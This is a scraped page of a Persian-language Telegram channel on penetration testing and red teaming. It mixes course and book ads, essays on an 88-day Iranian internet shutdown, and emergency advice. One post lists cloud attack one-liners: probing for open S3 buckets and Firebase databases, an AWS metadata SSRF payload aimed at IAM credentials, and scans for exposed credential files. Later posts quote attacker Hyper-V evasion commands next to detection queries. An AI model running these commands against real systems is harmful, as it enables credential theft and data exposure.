Try Hack Box

Открыть в Telegram

1 Nov 2020 1399/08/11 آموزش تست نفوذ و ردتیم https://linkedin.com/company/tryhackbox-org/ یوتیوب https://youtube.com/@tryhackbox کانال ها : @TryHackBoxOfficial ( نقشه راه ) @TryHackBoxStory ( اخبار و داستانهای هک ) پشتیبانی : @ThbxSupport

Больше

Иран41 478 Технологии и приложения16 736

6 223

Подписчики

Нет данных24 часа

+157 дней

+6230 день

2 080

Просмотры поста

~ 63224 часа

~ 86148 часов

33.42%

Коэффициент вовлеченности

~ 1

Постов в день

Ads index

beta

Архив постов

6 223

دعوت به همکاری در تدریس دوره‌های ردتیم درود ما به دنبال یک فرد با تجربه در زمینه ردتیم و اوسینت هستیم تا در تدریس دوره‌های آموزشی به ما کمک کند. اگر در این حوزه تخصص دارید و مایل به همکاری هستید، لطفاً با ما تماس بگیرید. تمام مطالب آموزشی از طرف ما ارائه می‌شود و شما فقط باید بر روی محتوای آن تسلط داشته باشید. اگر علاقه‌مندید، پیام دهید به: @THBxSupport منتظر شما هستیم .

6 223

فکر می‌کنید، xss نمی‌ تواند در اندپوینت .html فعال شود؟ کاملاً ممکن است! تصویر را ببینید و در بخش نظرات به من بگویید چه کسی می‌تواند آن را به‌ خوبی توضیح دهد... @TryHackBox #باگ_بانتی #xss

6 223

دوستان بخاطر شرایط ناپایدار مجبورا و ناخواسته مجبور شدیم یک کانال توی بله بالا بیاریم ، برای اینکه از آموزش و خرید کتابهای جدید جا نمونید اگه این بله دارید ما را دنبال کنید فعلا فعالیت همینجاست ولی از جایی که شرایط کشور معلوم نیست چی به چیه اجتمال قطعی اینترنت هست . کانال ما در بله https://ble.ir/TryHackBox

6 223

📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته 📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers) این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می‌ کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیب‌پذیری‌ها، و تکنیک‌های نفوذ می‌ پردازد. محتوای اصلی کتاب شامل فصل‌هایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیک‌های کپچرینگ پکت‌ها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است. این کتاب مناسب چه کسانی است؟ ویژگی‌ های کتاب ؟ چرا باید این کتاب را بخرید؟ دانلود فایل های تمرین و سناریوها نمونه کتاب توضیحات کامل را بخوانید . 💰 ~~قیمت : ۲۵۰,۰۰۰~~ 💰 تخفیف : ۲۰۰,۰۰۰ تومان 📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: @THBxSupport

6 223

💢 پایان بزرگ‌ترین خاموشی دیجیتال برای ایرانیان لبخندی تلخ پس از ۸۸ روز تاریکی ➖➖➖➖➖ در واپسین روزهای آن ۸۸ روزِ طاقت‌فرسا، نفسِ جمعیِ جامعه را می‌شد در قالبِ اضطرابی خام و پنهان دید، ترس از قطع ارتباط، حس بی‌اطمینانیِ کسب‌وکارها و خشمِ فروخورده‌ای که به‌جای گفتگو به بازارِ راه‌حل‌های فردی و پرهزینه سوق داده شد. این پایان، بیش از یک بازگشت تکنیکی به اتصال، فرصتی است برای التیامِ جمعی برای تبدیلِ خشمِ پراکنده به مطالبه‌ای مدنی برای شفافیت و دسترسیِ برابر شهروندان . در نهایت کاربران ایرانی از طولانی‌ترین تاریکی دیجیتال بیرون آمدند، انتظار به پایان رسید و اکنون با همان فیلترشکن‌ های فعال، تجربه‌ای از اتصال هرچند نه کاملاً آزاد در دسترس است. نیازی به صرف هزینه‌های هنگفت برای کانفیگ‌های اختصاصی نیست؛ امروز راه‌های معقول‌ تر و مقرون‌ به‌ صرفه‌تری برای بازیابی دسترسی وجود دارد و خرید بسته‌های قیمت‌بر دیگر شرط لازمِ آنلاین‌شدن نیست ( نیاز به خرید کانفیگ های میلیونی نیست ). اگرچه نباید ساده انگاشت که خرید سرویس‌های پولی یا کانفیگ‌ها بی‌معناست؛ اما تجربه نشان داد که اتکا به راه‌حل‌های انفرادی و پرهزینه نمی‌تواند جایگزین تلاش جمعی و فشار عمومی برای بازگرداندن دسترسی عمومی شود. کسانی که از فروش کانفیگ سود می‌برند ممکن است از تعجیل در بازگردانی کامل سرویس‌ها منفعت نبرند؛ بنابراین هوشیاری عمومی و مطالبهٔ شفافیت از مسئولان ضروری است. لبخند، پس از ۸۸ روز خاموشی تلخ است؛ آن روزها خاطره‌ای از ناامنی، اضطراب و قطع‌صلح اقتصادی برجای گذاشت که نمی‌توان بی‌تفاوت از کنارش گذشت. من شخصاً در آن دوره سراغ خرید کانفیگ نرفتم؛ معتقدم در شرایطی که دسترسی عمومی مختل است، اولویت باید بازگرداندن سرویس برای همه باشد نه راه‌حل‌های فردی. در عین حال امیدوارم توسعه‌دهندگان ابزارهایی خلق کنند که ترافیک‌شان کمتر قابل‌شناسایی و مقاومت‌شان در برابر اختلال و قطعی بیشتر باشد. این ۸۸ روز، در کنار تلخی‌ ها، درس‌های مهمی آورد: آسیب‌پذیری زیرساخت‌ها آشکار شد، کسب‌وکارهای کوچک و فروشگاه‌های آنلاین متحمل زیان شدند، پروژه‌ها به تعویق افتاد و فرصت‌های اقتصادی از دست رفت. اضطراب ناشی از قطع ارتباط، احساس بی‌اطمینانی صاحبان کسب‌وکار، و فشار روانی کاربرانی که برای حفظ ارتباط به گزینه‌های پرهزینه روی آوردند همه این‌ها تصویر روشنی از هزینه‌های پنهان چنین رخدادهایی ارائه می‌دهد و به مخاطب یادآوری می‌کند که راه‌حل‌های جمعی و شفافیت سیستماتیک، تنها راه جلوگیری از تکرار آن است. کاش روزی برسد که «فیلترینگ» و «کانفیگ» تنها واژه‌هایی تاریخی باشند و دسترسی امن و پایدار به اینترنت، حقی بدیهی برای همه است.‌

⭕ با توجه به ۸۸ روز قطعی اینترنت و عدم دسترسی به منابع آنلاین، خطرات و آسیب‌پذیری‌های متعددی برای سازمان‌ها و نهادهای دولتی به وجود آمده است. این مدت زمان طولانی، فرصتی را برای هکرها فراهم کرده تا با اهداف غیرقانونی خود به اطلاعات حساس دسترسی پیدا کنند و آسیب‌پذیری‌ های موجود را شناسایی کنند. با بازگشت اینترنت، احتمال حملات سایبری افزایش یافته و سازمان‌ ها باید به شدت مراقب باشند. این حملات می‌توانند شامل نفوذ به سیستم‌ ها از طریق تکنیک‌ های فیشینگ، بدافزارها و حملات DDoS باشند که هدف آن‌ ها مختل کردن زیرساخت‌های حیاتی و سرقت اطلاعات حساس است. به علاوه، با توجه به اینکه بسیاری از کارمندان در این مدت از راه دور کار کرده‌اند، احتمال بروز مشکلات امنیتی ناشی از استفاده از شبکه‌های ناامن و عدم رعایت پروتکل‌ های امنیتی نیز افزایش یافته است. بنابراین، ضروری است که سازمان‌ها و نهادهای دولتی اقدامات امنیتی خود را تقویت کرده و بر روی آموزش کارکنان در زمینه امنیت سایبری تمرکز کنند تا از هرگونه تهدید احتمالی جلوگیری شود.

 با احترام کاوه - تیم TryHackBox #اینترنت

6 223

پایان بزرگ‌ترین خاموشی دیجیتال برای ایرانیان لبخندی تلخ پس از ۸۸ روز تاریکی در واپسین روزهای آن ۸۸ روزِ طاقت‌فرسا، نفسِ جمعیِ جامعه را می‌شد در قالبِ اضطرابی خام و پنهان دید، ترس از قطع ارتباط، حس بی‌اطمینانیِ کسب‌وکارها و خشمِ فروخورده‌ای که به‌جای گفتگو به بازارِ راه‌حل‌های فردی و پرهزینه سوق داده شد. این پایان، بیش از یک بازگشت تکنیکی به اتصال، فرصتی است برای التیامِ جمعی برای تبدیلِ خشمِ پراکنده به مطالبه‌ای مدنی برای شفافیت و دسترسیِ برابر شهروندان . در نهایت کاربران ایرانی از طولانی‌ترین تاریکی دیجیتال بیرون آمدند، انتظار به پایان رسید و اکنون با همان فیلترشکن‌ های فعال، تجربه‌ای از اتصال هرچند نه کاملاً آزاد در دسترس است. نیازی به صرف هزینه‌های هنگفت برای کانفیگ‌های اختصاصی نیست؛ امروز راه‌های معقول‌ تر و مقرون‌ به‌ صرفه‌تری برای بازیابی دسترسی وجود دارد و خرید بسته‌های قیمت‌بر دیگر شرط لازمِ آنلاین‌شدن نیست. اگرچه نباید ساده انگاشت که خرید سرویس‌های پولی یا کانفیگ‌ها بی‌معناست؛ اما تجربه نشان داد که اتکا به راه‌حل‌های انفرادی و پرهزینه نمی‌تواند جایگزین تلاش جمعی و فشار عمومی برای بازگرداندن دسترسی عمومی شود. کسانی که از فروش کانفیگ سود می‌برند ممکن است از تعجیل در بازگردانی کامل سرویس‌ها منفعت نبرند؛ بنابراین هوشیاری عمومی و مطالبهٔ شفافیت از مسئولان ضروری است. لبخند، پس از ۸۸ روز خاموشی تلخ است؛ آن روزها خاطره‌ای از ناامنی، اضطراب و قطع‌صلح اقتصادی برجای گذاشت که نمی‌توان بی‌تفاوت از کنارش گذشت. من شخصاً در آن دوره سراغ خرید کانفیگ نرفتم؛ معتقدم در شرایطی که دسترسی عمومی مختل است، اولویت باید بازگرداندن سرویس برای همه باشد نه راه‌حل‌های فردی. در عین حال امیدوارم توسعه‌دهندگان ابزارهایی خلق کنند که ترافیک‌شان کمتر قابل‌شناسایی و مقاومت‌شان در برابر اختلال و قطعی بیشتر باشد. این ۸۸ روز، در کنار تلخی‌ ها، درس‌های مهمی آورد: آسیب‌پذیری زیرساخت‌ها آشکار شد، کسب‌وکارهای کوچک و فروشگاه‌های آنلاین متحمل زیان شدند، پروژه‌ها به تعویق افتاد و فرصت‌های اقتصادی از دست رفت. اضطراب ناشی از قطع ارتباط، احساس بی‌اطمینانی صاحبان کسب‌وکار، و فشار روانی کاربرانی که برای حفظ ارتباط به گزینه‌های پرهزینه روی آوردند همه این‌ها تصویر روشنی از هزینه‌های پنهان چنین رخدادهایی ارائه می‌دهد و به مخاطب یادآوری می‌کند که راه‌حل‌های جمعی و شفافیت سیستماتیک، تنها راه جلوگیری از تکرار آن است. کاش روزی برسد که «فیلترینگ» و «کانفیگ» تنها واژه‌هایی تاریخی باشند و دسترسی امن و پایدار به اینترنت، حقی بدیهی برای همه است.‌

⭕ با توجه به ۸۸ روز قطعی اینترنت و عدم دسترسی به منابع آنلاین، خطرات و آسیب‌پذیری‌های متعددی برای سازمان‌ها و نهادهای دولتی به وجود آمده است. این مدت زمان طولانی، فرصتی را برای هکرها فراهم کرده تا با اهداف غیرقانونی خود به اطلاعات حساس دسترسی پیدا کنند و آسیب‌پذیری‌ های موجود را شناسایی کنند. با بازگشت اینترنت، احتمال حملات سایبری افزایش یافته و سازمان‌ ها باید به شدت مراقب باشند. این حملات می‌توانند شامل نفوذ به سیستم‌ ها از طریق تکنیک‌ های فیشینگ، بدافزارها و حملات DDoS باشند که هدف آن‌ ها مختل کردن زیرساخت‌های حیاتی و سرقت اطلاعات حساس است. به علاوه، با توجه به اینکه بسیاری از کارمندان در این مدت از راه دور کار کرده‌اند، احتمال بروز مشکلات امنیتی ناشی از استفاده از شبکه‌های ناامن و عدم رعایت پروتکل‌ های امنیتی نیز افزایش یافته است. بنابراین، ضروری است که سازمان‌ها و نهادهای دولتی اقدامات امنیتی خود را تقویت کرده و بر روی آموزش کارکنان در زمینه امنیت سایبری تمرکز کنند تا از هرگونه تهدید احتمالی جلوگیری شود.

 با احترام کاوه - تیم TryHackBox

6 223

Repost from NetBlocks

📈 Confirmed: Live metrics show a partial restoration to internet connectivity in #Iran on day 88, after 2093 hours of near-total isolation from international networks, the longest nationwide internet shutdown in modern history. It is unclear if the restoration will be sustained.

6 223

گیت هاب در دسترس قرار گرفته اما امکان دانلود Release پروژه ها بدون VPN ندارید.

6 223

کانفیگ های قدیمی که خریداری کردید رو اینترنت ایرانسل تست کنید به نظر میاد یه سریاشون پینگ میدن و کار می کنن. مشخص نیست اختلال هست یا مرحله مرحله قراره حالت عادی برگردیم

6 223

سایت Lets encrypt داخل مرورگر باز میشه، اما امکان تمدید ssl با certbot همچنان مقدور نیست و ارور connection برمی‌گردونه

6 223

این سایت ها وایت لیست شدن چک کنید. پیپ تست زدم نیم ساعت پیش کار کرد، صحت بقیه اطلاع ندارم https://react.dev http://ubuntu.com http://Python.org https://vercel.com/ https://nextjs.org/ https://sourceforge.net/ https://letsencrypt.org/

6 223

📣 ارسال لینک و فایل داخل گروه برای شرایط فعلی آزاد شد رفقا. می تونید با هم ارتباط بگیرید و لینک و فایل کانفینگ و... تبادل کنید. برای همتون آرزوی سلامتی دارم. به امید روزی که حال دل و.... هممون بهتر از گذشته باشه t.me/TryHackBoxGroup 🔗

6 223

در این شرایط بحرانی، حفظ امنیت و سلامت خود و خانواده ‌تان از اهمیت ویژه ‌ای برخوردار است. لطفاً به دقت مراقب یکدیگر باشید و اقلام ضروری را تهیه کنید. • ذخیره مواد غذایی خشک و غیرپرمصرف: حداقل یک هفته. • آب آشامیدنی: سازمان ‌های امدادی معمولاً 2–3 لیتر به ازای هر نفر در روز پیشنهاد می‌کنند (برای 3 روز = 6–9 لیتر برای هر نفر). بهتر است مطابق دستورالعمل ‌های رسمی محاسبه کنید. • سوخت: کافی برای 200–300 کیلومتر سفر یا بر اساس نیاز محلی؛ باک، بررسی وضعیت خودرو و حمل ابزار لازم. • آمادگی برای قطع برق: چراغ قوه، باتری اضافی، پاوربانک، شارژر خورشیدی یا ژنراتور کوچک در صورت امکان. • ارتباط آفلاین: نصب اپلیکیشن ‌های معتبر برای پیام ‌رسانی بدون اینترنت (قبل از بحران، قابلیت‌ها و امنیتشان را بررسی کنید). • همبستگی محله‌ای: کمک به سالمندان، جمع‌‌آوری داروهای ضروری، ذخیره دارایی نقدی کوچکی (پول نقد) و برنامه ‌ریزی تماس ‌های اضطراری. مواظب خود و خانواده خود باشید

6 223

درود دوستان گرامی ما به دنبال یک تدوین‌ گر هستیم. اگر شما در زمینه تدوین فعالیت دارید یا کسی را می‌ شناسید که بتواند به ما کمک کند، لطفاً با ما در ارتباط باشید : @ThbxSupport

6 223

✎ Cloud Security One Liners • AWS S3 Bucket Finder

cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

• S3 Permission Check

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

• Firebase Database

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

• Azure Blob Storage

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt

• GCP Storage

cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

• AWS Metadata SSRF

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

• Cloud Credential Files

cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

@TryHackBox | @TryHackBoxOfficial #باگ_بانتی #کلاد 🕊🥀

6 223

Repost from ⁪

🔖 در عملیات تیم قرمز، اغلب با پیاده‌سازی‌ های داخلی VDI روبرو می‌شویم که دسترسی به اینترنت و شبکه خارجی ندارند، و به همین دلیل نمی‌توانیم اسکریپت‌ های PowerShell خود را برای شمارش AD و کاربران آن در سیستم ‌های آسیب‌دیده دانلود کنیم.

در بیشتر دوره ‌های تیم قرمز، دانشجویان را تشویق می ‌کنند تا از اسکریپت‌ های PowerShell آماده برای شمارش محیط AD استفاده کنند، مانند powerview.ps1، که روشی بسیار مناسب و غیرپیچیده است. اما اگر این روش مناسب برای ما نامناسب شود و اجازه دانلود اسکریپت‌های PowerShell یا هر ابزار دیگری از اینترنت در سیستم آسیب‌دیده را نداشته باشیم، چه باید کرد؟ اسکریپت‌هایی مانند Powerview.ps1 از توابع برای ساده‌سازی کارها استفاده می‌کنند. اما برخی از دستورات تک‌ خطی وجود دارند که می ‌توانند همان کار را در صورت عدم دسترسی به powerview انجام دهند.

در این آموزش، به بررسی این دستورات تک ‌خطی می‌پردازیم که می‌توانند به ما در شمارش AD کمک کنند. توییتر بنده : https://www.x.com/kavehxnet 🥀🕊🖤 @KavehOffSec #ردتیم

6 223

🔖 مینی دوره #رایگان نصب و راه‌اندازی لابراتورهای تست نفوذ وب قسمت اول : DVWA، Juice Shop و VulnerableApp توی این ویدئو نحوه نصب راحت و آسان سه تا لابراتوار فوق العاده برای تمرین گفتیم

1 - dvwa : https://github.com/sagikazarmark/docker-dvwa 2 - juice shop : https://github.com/juice-shop/juice-shop 3 - VunlableApp : https://github.com/SasanLabs/VulnerableApp

🔗از لینک هایی که گذاشتیم میتونید برید و سر بزنید به اصل داکیومنت ها و بخونید ⚠️توصیه مهم ای که هست حتما سرویس ها رو بعد از استفاده خاموش کنید "دست هاتون رو آلوده کنید و شروع کنید به تمرین تمرین تمرین" 🔗 https://youtu.be/G6jdNx5JHv4

انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیت‌تری ارائه بدیم،امیدواریم از آموزش لذت ببرید.

ما رو در شبکه های زیر دنبال داشته باشید : 🥀 @TryHackBox | @TryHackBoxOfficial Linkedin | YouTube | GitHub | Insta #HomeLab #WebPentest #dvwa #docker

6 223

ایا دسترسی دارید که دوره رو ادامه بدیم یا نه؟

Anonymous voting

6 223

🔖 مهاجمان همچنان به آزمایش با پلتفرم‌ های مختلف مدیریت از راه دور ادامه می‌ دهند، بنابراین امروز یک مثال دیگر از ابزارهای دسترسی از راه دور را بررسی می‌کنیم: نرم‌افزار Desktop Remote (T1219.002). به مورد UNK_SmudgedSerpent نگاه می‌کنیم. مهاجم از ایمیل‌ های فیشینگ برای سرقت اطلاعات حساب کاربری و همچنین برای ارسال آرشیوهایی با فایل‌ های MSI استفاده کرده است که RMM را بارگذاری می‌کنند. در اکثر موارد، مهاجمان از PDQConnect نرم‌افزار نظارت و مدیریت از راه دور استفاده کرده‌اند. اگر شما از این نرم‌افزار در زیرساخت خود استفاده نمی‌کنید، این می‌ تواند تارگت خوبی برای شکار باشد:

event_type: "processcreatewin"

AND

proc_file_productname: "PDQConnectAgent"

همچنین می‌توانید به دنبال دامنه‌های مرتبط بگردید:

event_type: "dnsreqwin"

AND

dns_rname: "app.pdq.com"

نظرات خود را با ما به اشتراک بگذارید

🕊 @TryHackBox | 🥀 @TryHackBoxOfficial #امنیت_سایبری

6 223

🔖 استفاده از ماشین‌های مجازی برای بایپس کردن ابزارهای امنیتی روز به روز محبوب‌ تر می‌شود. امروز به یک نمونه دیگر از پیاده‌سازی زیرتکنیک Hide Artifacts: Run Virtual Instance (T1564.006) نگاهی خواهیم انداخت. بر اساس گزارش، مهاجم قابلیت Hyper-V را بر روی یک ماشین ویندوزی که به خطر افتاده بود، فعال کرد و سپس یک ماشین مجازی مبتنی بر Alpine Linux که حاوی بدافزار بود، دانلود و وارد کرد. پس از دانلود، ماشین مجازی با استفاده از PowerShell وارد شد:

"cmd.exe" /C powershell.exe -c import-vm -path "c:\\programdata\\microsoft\\AppV\\app\\Virtual Machines\\1DBCC80B-5803-4AF1-8772-712C688F408A.vmcx" -Copy -GenerateNewId > c:\\Programdata\\WindowsUpdateTask_t.tmp 2>&1

همچنین از PowerShell برای راه‌اندازی ماشین مجازی تازه وارد شده استفاده شد:

"cmd.exe" /C powershell.exe -c Start-VM -name WSL > c:\\Programdata\\WindowsUpdateTask_R.tmp 2>&1

به عنوان مثال، می‌توان به دنبال دستورات مربوط به مدیریت ماشین‌ های مجازی گشت:

event_type: "processcreatewin"

AND

proc_file_path: "powershell.exe"

AND

cmdline: ("import-vm" OR "start-vm")

آیا تا به حال با تکنیک‌ های مشابه ای مواجه شده‌اید؟ نظرات و تجربیات خود را به اشتراک بگذارید!

🕊 @TryHackBox | TryHackBoxOfficial #امنیت_سایبری